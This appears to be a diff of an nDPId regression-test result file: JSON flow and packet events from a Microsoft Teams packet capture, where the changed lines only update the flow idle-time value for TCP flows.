-00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":620,"source":"teams.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1587041678074,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041678074,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG94LAqAEGNHJNIex5Abv0H+uPO2V4UYAQEAlydQAAAQEICjCEne9hEv\/b"} -00971{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":621,"source":"teams.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041678029,"flow_last_seen":1587041678074,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1587041678074,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60537,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01500{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":625,"source":"teams.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1587041678029,"flow_last_seen":1587041678120,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4409,"flow_avg_l4_payload_len":551,"midstream":0,"thread_ts_msec":1587041678120,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60537,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","server_names":"*.events.data.microsoft.com,events.data.microsoft.com,*.pipe.aria.microsoft.com,pipe.skype.com,*.pipe.skype.com,*.mobile.events.data.microsoft.com,mobile.events.data.microsoft.com,*.events.data.msn.com,events.data.msn.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"ae4edc6faf64d08308082ad26be60767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=*.events.data.microsoft.com","fingerprint":"33:B3:B7:E9:DA:25:F5:A0:04:E9:63:87:B6:FB:54:77:DB:ED:27:EB"}} +00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":618,"source":"teams.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041678029,"flow_last_seen":1587041678029,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041678029,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60537,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":618,"source":"teams.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1587041678029,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041678029,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG93bAqAEGNHJNIex5Abv0H+uOAAAAALAC\/\/9XkAAAAgQFtAEDAwUBAQgKMISdwwAAAAAEAgAA"} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":619,"source":"teams.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1587041678074,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041678074,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8KlZAAGwGoSQ0ck0hwKgBBgG77Hk7ZXhQ9B\/rj6ASIAAz8QAAAgQFoAEDAwgEAggKYRL\/2zCEncM="} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":620,"source":"teams.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1587041678074,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041678074,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG94LAqAEGNHJNIex5Abv0H+uPO2V4UYAQEAlydQAAAQEICjCEne9hEv\/b"} +00971{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":621,"source":"teams.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041678029,"flow_last_seen":1587041678074,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1587041678074,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60537,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01500{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":625,"source":"teams.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1587041678029,"flow_last_seen":1587041678120,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4409,"flow_avg_l4_payload_len":551,"midstream":0,"thread_ts_msec":1587041678120,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60537,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","server_names":"*.events.data.microsoft.com,events.data.microsoft.com,*.pipe.aria.microsoft.com,pipe.skype.com,*.pipe.skype.com,*.mobile.events.data.microsoft.com,mobile.events.data.microsoft.com,*.events.data.msn.com,events.data.msn.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"ae4edc6faf64d08308082ad26be60767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=*.events.data.microsoft.com","fingerprint":"33:B3:B7:E9:DA:25:F5:A0:04:E9:63:87:B6:FB:54:77:DB:ED:27:EB"}} 00181{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":644,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041678611} 00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":644,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041678303,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":645,"source":"teams.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041679059,"flow_last_seen":1587041679059,"flow_idle_time":180000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1587041679059,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":64046,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} @@ -87,10 +87,10 @@ 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":664,"source":"teams.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041680216,"flow_last_seen":1587041680216,"flow_idle_time":180000,"flow_min_l4_payload_len":355,"flow_max_l4_payload_len":355,"flow_tot_l4_payload_len":355,"flow_avg_l4_payload_len":355,"midstream":0,"thread_ts_msec":1587041680216,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00927{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":664,"source":"teams.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1587041680216,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":397,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":397,"pkt_l4_len":363,"thread_ts_msec":1587041680216,"pkt":"\/\/\/\/\/\/\/\/AICPmq69CABFAAF\/44MAAEARlesAAAAA\/\/\/\/\/wBEAEMBa5dnAQEGABWCmMYYtQAAAAAAAAAAAAAAAAAAAAAAAACAj5quvQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEBPRP\/j5quvQABAAEfyzfOuCfrPQjbUAB0AQE5AgXcPC1kaGNwY2QtNi4xMC4xOkxpbnV4LTQuOS41Ny12Nys6YXJtdjdsOkJDTTI4MzUMDHBpMy5udG9wLm9yZ5EBATcPAXkhAwYMDxocKjM2Ojt3\/w=="} 00693{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":664,"source":"teams.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041680216,"flow_last_seen":1587041680216,"flow_idle_time":180000,"flow_min_l4_payload_len":355,"flow_max_l4_payload_len":355,"flow_tot_l4_payload_len":355,"flow_avg_l4_payload_len":355,"midstream":0,"thread_ts_msec":1587041680216,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"","fingerprint":"","class_ident":""}} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":665,"source":"teams.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041680294,"flow_last_seen":1587041680294,"flow_idle_time":7440000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":1,"thread_ts_msec":1587041680294,"l3_proto":"ip4","src_ip":"93.62.150.157","dst_ip":"192.168.1.6","src_port":443,"dst_port":60512,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00519{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":665,"source":"teams.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1587041680294,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":102,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":102,"pkt_l4_len":68,"thread_ts_msec":1587041680294,"pkt":"KDc3AG3IEBMx8Tl2CABFAABYCTNAAHEGSuNdPpadwKgBBgG77GBJd2ZkkI5L3oAY\/\/uUpgAAAQEICsJ1bW4wg\/kbFwMDAB8AAAAAAAAABVYf48xkHJTZ\/YMO7dmv4tC6Gofi60hR"} -00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":666,"source":"teams.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1587041680294,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1587041680294,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGhUbAqAEGXT6WnexgAbuQjkveAAAAAFAEAAAvzgAA"} -01944{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":667,"source":"teams.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1587041680294,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1156,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1156,"pkt_l4_len":1122,"thread_ts_msec":1587041680294,"pkt":"KDc3AG3IEBMx8Tl2CABFAAR2CTRAAHEGRsRdPpadwKgBBgG77GBJd2aIkI5L3oAY\/\/v9PwAAAQEICsJ1bW4wg\/kbFwMDBD0AAAAAAAAABm9iu+t9XgqZR4s0F3BUPHh3OFodjBrwIjhJ5jzUDrtlDVli1SVxk270m+gEbse5EGdXD2tQPqX+uNfx4B7otIIyfqifH2S\/KFxGyKDkumEYrUX2hsTy4AvsIXg77ggsd77nUCYIUkr9Dcu1K8XBBisxPpHT+zWCDZADIu9GEbXV2\/9sowiGe8yrlpVrokOfQ1DpsHmZowwlG7Bi36UFm+L5Z6cwifqjKB8bGHxJp5qTVRJD\/elikR43sBRzkZfcKqYDSp7JYzhK3QKUfc6m5GUQ5dfnLhv5nlfAs74UtmJ5EyjXuAHe9YxanSSvzzG4JMTWGAY5tTjjtYwpZihFAGx52HToq2O+CpcbwPHV1TLQUDbT2yGJc7gM1GLG5aFGzYu4CebCnnBl2NsUqq80dM5DZBgWZFtSy9z2NYnNFnXM\/L50k82dbGP\/hbFfCNFMS6BvXhwvqUQidPN2cRmVwTsWXaFgKlMTAFoatWZ\/LRmGoWBdnNparAnK8NJzgtzGWejWpNSxsXZQ1NSy\/4QwWmZ1aiyH3lAZfsyIjqYBH478mZLwQeLwCsFzK39ybhvc8awbkRiAIoeLHCDrqRPBNhP62oMKfuuybYfQO5cgeLBcoVWj4YmTHvVqXUaiIJM0ecCweYrE28c1bMOuRYrnD6X5H1vOaut8zUARe+SwmWED1FAd9+LaLocuQm5mzrdNkB6aXE4s0lhsnmXfrvdjFstoXCwJT0nh7ITIpoT2HCapxHTDXopSW+f6iqr0aTti5yh8nUUMgZZ++9jn1o3T3lmRclm9+mgQdUUmHkA3dQCgvlVHN9ZAWzkNyqS56Hs+VXyhIUgDoTONh43ut\/yBnqLWJ6HXKcI6qe1ntdtXyoQyjYZpSOnm2uYp+6WFP8eztjtGexEu6hDqMx2fyQv\/mVl0auJxOvVANURsh9C6cu1LRWqw8SukcmJhO9ptW5iUNYclFK0BRMa7HDoqgqFCccb2WkU4sxDCVFF52CIMR33VkffteHiI9\/NgTNgZERM3tobFzsdXrDpRRXLWDage6O7fLzs8m9hERZCv46Exgndu8ho3VvbFCaZyMsnBpC0\/L6igC1xzLSs2ksZSkx5L9Q7VhMaHlPusEBUMQJ5uA6CkdGrw0a3GiTrkSUGJIGKC7WyL+yh36GZcaflqIrfqPpArwHS0O6hsLRU\/2t+Pwt19umaYcC7QuLOwfSwEr1PxrFtzW1mzlNCKarl0LmPBlPWyV5JfN4y4C1aRVZ7yV7\/4iclnIrddqAkiXdgSc+ai4OnXQhk4fgmfh+Ar5gfpmM8U2v\/X345bEZszWOszb+cdvmzW47cwiYheg59HkuZ4TWUwEFRrPkd047noDz+bhfvXLMYNCStN2XWEGpRFtvI8rpdiTmvHc7+aKDQSaaH8jzVNbso1cSOHqJjXtpeD+vrVfOMXgQ=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":665,"source":"teams.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041680294,"flow_last_seen":1587041680294,"flow_idle_time":7560000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":1,"thread_ts_msec":1587041680294,"l3_proto":"ip4","src_ip":"93.62.150.157","dst_ip":"192.168.1.6","src_port":443,"dst_port":60512,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00519{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":665,"source":"teams.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1587041680294,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":102,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":102,"pkt_l4_len":68,"thread_ts_msec":1587041680294,"pkt":"KDc3AG3IEBMx8Tl2CABFAABYCTNAAHEGSuNdPpadwKgBBgG77GBJd2ZkkI5L3oAY\/\/uUpgAAAQEICsJ1bW4wg\/kbFwMDAB8AAAAAAAAABVYf48xkHJTZ\/YMO7dmv4tC6Gofi60hR"} +00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":666,"source":"teams.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1587041680294,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1587041680294,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGhUbAqAEGXT6WnexgAbuQjkveAAAAAFAEAAAvzgAA"} +01944{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":667,"source":"teams.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1587041680294,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1156,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1156,"pkt_l4_len":1122,"thread_ts_msec":1587041680294,"pkt":"KDc3AG3IEBMx8Tl2CABFAAR2CTRAAHEGRsRdPpadwKgBBgG77GBJd2aIkI5L3oAY\/\/v9PwAAAQEICsJ1bW4wg\/kbFwMDBD0AAAAAAAAABm9iu+t9XgqZR4s0F3BUPHh3OFodjBrwIjhJ5jzUDrtlDVli1SVxk270m+gEbse5EGdXD2tQPqX+uNfx4B7otIIyfqifH2S\/KFxGyKDkumEYrUX2hsTy4AvsIXg77ggsd77nUCYIUkr9Dcu1K8XBBisxPpHT+zWCDZADIu9GEbXV2\/9sowiGe8yrlpVrokOfQ1DpsHmZowwlG7Bi36UFm+L5Z6cwifqjKB8bGHxJp5qTVRJD\/elikR43sBRzkZfcKqYDSp7JYzhK3QKUfc6m5GUQ5dfnLhv5nlfAs74UtmJ5EyjXuAHe9YxanSSvzzG4JMTWGAY5tTjjtYwpZihFAGx52HToq2O+CpcbwPHV1TLQUDbT2yGJc7gM1GLG5aFGzYu4CebCnnBl2NsUqq80dM5DZBgWZFtSy9z2NYnNFnXM\/L50k82dbGP\/hbFfCNFMS6BvXhwvqUQidPN2cRmVwTsWXaFgKlMTAFoatWZ\/LRmGoWBdnNparAnK8NJzgtzGWejWpNSxsXZQ1NSy\/4QwWmZ1aiyH3lAZfsyIjqYBH478mZLwQeLwCsFzK39ybhvc8awbkRiAIoeLHCDrqRPBNhP62oMKfuuybYfQO5cgeLBcoVWj4YmTHvVqXUaiIJM0ecCweYrE28c1bMOuRYrnD6X5H1vOaut8zUARe+SwmWED1FAd9+LaLocuQm5mzrdNkB6aXE4s0lhsnmXfrvdjFstoXCwJT0nh7ITIpoT2HCapxHTDXopSW+f6iqr0aTti5yh8nUUMgZZ++9jn1o3T3lmRclm9+mgQdUUmHkA3dQCgvlVHN9ZAWzkNyqS56Hs+VXyhIUgDoTONh43ut\/yBnqLWJ6HXKcI6qe1ntdtXyoQyjYZpSOnm2uYp+6WFP8eztjtGexEu6hDqMx2fyQv\/mVl0auJxOvVANURsh9C6cu1LRWqw8SukcmJhO9ptW5iUNYclFK0BRMa7HDoqgqFCccb2WkU4sxDCVFF52CIMR33VkffteHiI9\/NgTNgZERM3tobFzsdXrDpRRXLWDage6O7fLzs8m9hERZCv46Exgndu8ho3VvbFCaZyMsnBpC0\/L6igC1xzLSs2ksZSkx5L9Q7VhMaHlPusEBUMQJ5uA6CkdGrw0a3GiTrkSUGJIGKC7WyL+yh36GZcaflqIrfqPpArwHS0O6hsLRU\/2t+Pwt19umaYcC7QuLOwfSwEr1PxrFtzW1mzlNCKarl0LmPBlPWyV5JfN4y4C1aRVZ7yV7\/4iclnIrddqAkiXdgSc+ai4OnXQhk4fgmfh+Ar5gfpmM8U2v\/X345bEZszWOszb+cdvmzW47cwiYheg59HkuZ4TWUwEFRrPkd047noDz+bhfvXLMYNCStN2XWEGpRFtvI8rpdiTmvHc7+aKDQSaaH8jzVNbso1cSOHqJjXtpeD+vrVfOMXgQ=="} 00181{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":669,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041680611} 00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":669,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041680294,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":850,"source":"teams.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041681218,"flow_last_seen":1587041681218,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1587041681218,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":56634,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} @@ -110,57 +110,57 @@ 00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":866,"source":"teams.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041681714,"flow_last_seen":1587041681714,"flow_idle_time":180000,"flow_min_l4_payload_len":53,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1587041681714,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":63106,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"eu-prod.asyncgw.teams.microsoft.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00651{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":873,"source":"teams.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1587041681744,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1587041681744,"pkt":"KDc3AG3IEBMx8Tl2CABFAAC9OkBAADkRg5jAqAEBwKgBBgA19oIAqQAAcuiBgAABAAMAAAAAB2V1LXByb2QHYXN5bmNndwV0ZWFtcwltaWNyb3NvZnQDY29tAAABAAHADAAFAAEAAAvAACoVYXNtLWFwaS1wcm9kLWV1LXRlYW1zDnRyYWZmaWNtYW5hZ2VyA25ldADAQQAFAAEAAAEsABoOd2V1MS1hcGktdGVhbXMIY2xvdWRhcHDAZsB3AAEAAQAAAAoABDRyS0Y="} 00806{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":873,"source":"teams.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041681714,"flow_last_seen":1587041681744,"flow_idle_time":180000,"flow_min_l4_payload_len":53,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1587041681744,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":63106,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"},"dns": {"query":"eu-prod.asyncgw.teams.microsoft.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.114.75.70"}} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":874,"source":"teams.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041681745,"flow_last_seen":1587041681745,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041681745,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.75.70","src_port":60538,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":874,"source":"teams.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1587041681745,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041681745,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG+VHAqAEGNHJLRux6AbuCUaOxAAAAALAC\/\/8ErAAAAgQFtAEDAwUBAQgKMISsLQAAAAAEAgAA"} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":874,"source":"teams.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041681745,"flow_last_seen":1587041681745,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041681745,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.75.70","src_port":60538,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":874,"source":"teams.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1587041681745,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041681745,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG+VHAqAEGNHJLRux6AbuCUaOxAAAAALAC\/\/8ErAAAAgQFtAEDAwUBAQgKMISsLQAAAAAEAgAA"} 